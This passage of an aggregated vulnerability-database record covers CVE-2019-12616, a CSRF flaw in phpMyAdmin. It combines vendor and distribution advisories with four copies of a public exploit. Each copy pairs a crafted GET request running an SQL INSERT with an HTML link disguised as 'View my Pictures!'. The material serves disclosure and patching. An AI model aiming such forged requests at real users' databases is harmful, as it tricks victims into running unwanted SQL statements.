[CWE-661](<https://cwe.mitre.org/data/definitions/661.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [015c404038c44279d95b6430ee5a0dddc97691ec](<https://github.com/phpmyadmin/phpmyadmin/commit/015c404038c44279d95b6430ee5a0dddc97691ec>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "edition": 3, "modified": "2019-06-04T00:00:00", "published": "2019-06-04T00:00:00", "id": "PHPMYADMIN:PMASA-2019-4", "href": "https://www.phpmyadmin.net/security/PMASA-2019-4/", "title": "CSRF vulnerability in login form", "type": "phpmyadmin", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:06:03", "description": "\nphpMyAdmin 4.8 - Cross-Site Request Forgery", "edition": 1, "published": "2019-06-11T00:00:00", "title": "phpMyAdmin 4.8 - Cross-Site Request Forgery", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12616"], "modified": "2019-06-11T00:00:00", "id": "EXPLOITPACK:81471032FA13FD77CD0746A8D3C15CC8", "href": "", "sourceData": "# Exploit Title: Cross Site Request Forgery (CSRF)\n# Date: 11 June 2019\n# Exploit Author: Riemann\n# Vendor Homepage: https://www.phpmyadmin.net/\n# Software Link: https://www.phpmyadmin.net/downloads/\n# Version: 4.8\n# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 \n# CVE : 2019-12616\n\n# Description\n# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.\t\n\n\n#VULNERABILITY:\nThe following request which is a form submission is done using the \u00a8GET\u00a8 request instead of using \u00a8POST\n<form method=\"get\" action=\"index.php\" class=\"disableAjax\">\n\nGET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1\n\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nConnection: keep-alive\nCookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133\nUpgrade-Insecure-Requests: 1\nHost: localhost:9000\n\nThe attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method\n\n#POC\n<!doctype html>\n\n<html lang=\"en\">\n<head>\n <meta charset=\"utf-8\">\n <title>POC CVE-2019-12616</title>\n</head>\n\n<body>\n<a href=\"http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark\">View my Pictures!</a>\n</body>\n</html>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-06-14T10:41:41", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12616"], "description": "\nThe phpMyAdmin development team reports:\n\nSummary\nCSRF vulnerability in login form\nDescription\nA vulnerability was found that allows an attacker to\n\t trigger a CSRF attack against a phpMyAdmin user. The\n\t attacker can trick the user, for instance through a broken\n\t <img> tag pointing at the victim's\n\t phpMyAdmin database, and the attacker can potentially\n\t deliver a payload (such as a specific INSERT or DELETE\n\t statement) through the victim.\nSeverity\nWe consider this vulnerability to be severe.\nMitigation factor Only the 'cookie'\n\t auth_type is affected; users can temporary use\n\t phpMyAdmin's http authentication as a workaround.\n\n", "edition": 1, "modified": "2019-06-04T00:00:00", "published": "2019-06-04T00:00:00", "id": "A5681027-8E03-11E9-85F4-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/a5681027-8e03-11e9-85f4-6805ca0b3d42.html", "title": "phpMyAdmin -- CSRF vulnerability in login form", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2019-06-11T14:42:30", "description": "", "published": "2019-06-11T00:00:00", "type": "exploitdb", "title": "phpMyAdmin 4.8 - Cross-Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12616"], "modified": "2019-06-11T00:00:00", "id": "EDB-ID:46982", "href": "https://www.exploit-db.com/exploits/46982", "sourceData": "# Exploit Title: Cross Site Request Forgery (CSRF)\r\n# Date: 11 June 2019\r\n# Exploit Author: Riemann\r\n# Vendor Homepage: https://www.phpmyadmin.net/\r\n# Software Link: https://www.phpmyadmin.net/downloads/\r\n# Version: 4.8\r\n# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 \r\n# CVE : 2019-12616\r\n\r\n# Description\r\n# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.\t\r\n\r\n\r\n#VULNERABILITY:\r\nThe following request which is a form submission is done using the \u00a8GET\u00a8 request instead of using \u00a8POST\r\n<form method=\"get\" action=\"index.php\" class=\"disableAjax\">\r\n\r\nGET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1\r\n\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nConnection: keep-alive\r\nCookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133\r\nUpgrade-Insecure-Requests: 1\r\nHost: localhost:9000\r\n\r\nThe attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method\r\n\r\n#POC\r\n<!doctype html>\r\n\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"utf-8\">\r\n <title>POC CVE-2019-12616</title>\r\n</head>\r\n\r\n<body>\r\n<a href=\"http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark\">View my Pictures!</a>\r\n</body>\r\n</html>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://www.exploit-db.com/download/46982"}], "packetstorm": [{"lastseen": "2019-06-17T03:59:50", "description": "", "published": "2019-06-11T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12616"], "modified": "2019-06-11T00:00:00", "id": "PACKETSTORM:153251", "href": "https://packetstormsecurity.com/files/153251/phpMyAdmin-4.8-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Cross Site Request Forgery (CSRF) \n# Date: 11 June 2019 \n# Exploit Author: Riemann \n# Vendor Homepage: https://www.phpmyadmin.net/ \n# Software Link: https://www.phpmyadmin.net/downloads/ \n# Version: 4.8 \n# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 \n# CVE : 2019-12616 \n \n# Description \n# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim. \n \n \n#VULNERABILITY: \nThe following request which is a form submission is done using the \u00a8GET\u00a8 request instead of using \u00a8POST \n<form method=\"get\" action=\"index.php\" class=\"disableAjax\"> \n \nGET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1 \n \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nConnection: keep-alive \nCookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133 \nUpgrade-Insecure-Requests: 1 \nHost: localhost:9000 \n \nThe attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method \n \n#POC \n<!doctype html> \n \n<html lang=\"en\"> \n<head> \n<meta charset=\"utf-8\"> \n<title>POC CVE-2019-12616</title> \n</head> \n \n<body> \n<a href=\"http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark\">View my Pictures!</a> \n</body> \n</html> \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/153251/phpmyadmin48-xsrf.txt"}], "zdt": [{"lastseen": "2019-06-12T20:00:03", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-06-11T00:00:00", "title": "phpMyAdmin 4.8 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12616"], "modified": "2019-06-11T00:00:00", "id": "1337DAY-ID-32859", "href": "https://0day.today/exploit/description/32859", "sourceData": "# Exploit Title: Cross Site Request Forgery (CSRF)\r\n# Exploit Author: Riemann\r\n# Vendor Homepage: https://www.phpmyadmin.net/\r\n# Software Link: https://www.phpmyadmin.net/downloads/\r\n# Version: 4.8\r\n# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8 \r\n# CVE : 2019-12616\r\n\r\n# Description\r\n# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.\t\r\n\r\n\r\n#VULNERABILITY:\r\nThe following request which is a form submission is done using the \u00a8GET\u00a8 request instead of using \u00a8POST\r\n<form method=\"get\" action=\"index.php\" class=\"disableAjax\">\r\n\r\nGET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1\r\n\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nConnection: keep-alive\r\nCookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133\r\nUpgrade-Insecure-Requests: 1\r\nHost: localhost:9000\r\n\r\nThe attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method\r\n\r\n#POC\r\n<!doctype html>\r\n\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"utf-8\">\r\n <title>POC CVE-2019-12616</title>\r\n</head>\r\n\r\n<body>\r\n<a href=\"http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark\">View my Pictures!</a>\r\n</body>\r\n</html>\n\n# 0day.today [2019-06-12] #", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/32859"}], "ubuntu": [{"lastseen": "2020-11-20T08:57:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7260", "CVE-2020-10804", "CVE-2020-10802", "CVE-2019-12616", "CVE-2018-19970", "CVE-2020-26935", "CVE-2019-6798", "CVE-2019-6799", "CVE-2020-5504", "CVE-2020-26934", "CVE-2019-11768", "CVE-2020-10803", "CVE-2018-19968"], "description": "It was discovered that there was a bug in the way phpMyAdmin handles the \nphpMyAdmin Configuration Storage tables. An authenticated attacker could \nuse this vulnerability to cause phpmyAdmin to leak sensitive files. \n(CVE-2018-19968)\n\nIt was discovered that phpMyAdmin incorrectly handled user input. An \nattacker could possibly use this for an XSS attack. (CVE-2018-19970)\n\nIt was discovered that phpMyAdmin mishandled certain input. An attacker \ncould use this vulnerability to execute a cross-site scripting (XSS) attack \nvia a crafted URL. (CVE-2018-7260)\n\nIt was discovered that phpMyAdmin failed to sanitize certain input. An \nattacker could use this vulnerability to execute an SQL injection attack \nvia a specially crafted database name. (CVE-2019-11768)\n\nIt was discovered that phpmyadmin incorrectly handled some requests. An \nattacker could possibly use this to perform a CSRF attack. (CVE-2019-12616)\n\nIt was discovered that phpMyAdmin failed to sanitize certain input. An \nattacker could use this vulnerability to execute an SQL injection attack \nvia a specially crafted username. (CVE-2019-6798, CVE-2020-10804, \nCVE-2020-5504)\n\nIt was discovered that phpMyAdmin would allow sensitive files to be leaked \nif certain configuration options were set. An attacker could use this \nvulnerability to access confidential information. (CVE-2019-6799)\n\nIt was discovered that phpMyAdmin failed to sanitize certain input. An \nattacker could use this vulnerability to execute an SQL injection attack \nvia a specially crafted database or table name. (CVE-2020-10802)\n\nIt was discovered that phpMyAdmin did not properly handle data from the \ndatabase when displaying it. If an attacker were to insert specially- \ncrafted data into certain database tables, the attacker could execute a \ncross-site scripting (XSS) attack. (CVE-2020-10803)\n\nIt was discovered that phpMyAdmin was vulnerable to an XSS attack. If a \nvictim were to click on a crafted link, an attacker could run malicious \nJavaScript on the victim's system. (CVE-2020-26934)\n\nIt was discovered that phpMyAdmin did not properly handler certain SQL \nstatements in the search feature. An attacker could use this vulnerability \nto inject malicious SQL into a query. (CVE-2020-26935)", "edition": 1, "modified": "2020-11-19T00:00:00", "published": "2020-11-19T00:00:00", "id": "USN-4639-1", "href": "https://ubuntu.com/security/notices/USN-4639-1", "title": "phpMyAdmin vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-06-18T02:21:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6612", "CVE-2016-6611", "CVE-2016-6630", "CVE-2016-6632", "CVE-2019-12616", "CVE-2016-9850", "CVE-2016-6607", "CVE-2016-6613", "CVE-2016-6606", "CVE-2016-9864", "CVE-2016-6626", "CVE-2016-9861", "CVE-2016-6627", "CVE-2016-9849", "CVE-2016-6628", "CVE-2016-6624", "CVE-2016-6631"], "description": "Package : phpmyadmin\nVersion : 4:4.2.12-2+deb8u6\nCVE ID : CVE-2016-6606 CVE-2016-6607 CVE-2016-6611 CVE-2016-6612\n CVE-2016-6613 CVE-2016-6624 CVE-2016-6626 CVE-2016-6627\n CVE-2016-6628 CVE-2016-6630 CVE-2016-6631 CVE-2016-6632\n CVE-2016-9849 CVE-2016-9850 CVE-2016-9861 CVE-2016-9864\n CVE-2019-12616\nDebian Bug : 930017\n\nMultiple security vulnerabilities were fixed in phpmyadmin, a MySQL web\nadministration tool, which prevent possible SQL injection attacks, CSRF,\nthe bypass of user restrictions, information disclosure or\ndenial-of-service.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n4:4.2.12-2+deb8u6.\n\nWe recommend that you upgrade your phpmyadmin packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2019-06-17T20:42:14", "published": "2019-06-17T20:42:14", "id": "DEBIAN:DLA-1821-1:AF0F6", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201906/msg00009.html", "title": "[SECURITY] [DLA 1821-1] phpmyadmin security update", "type": "debian", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}]}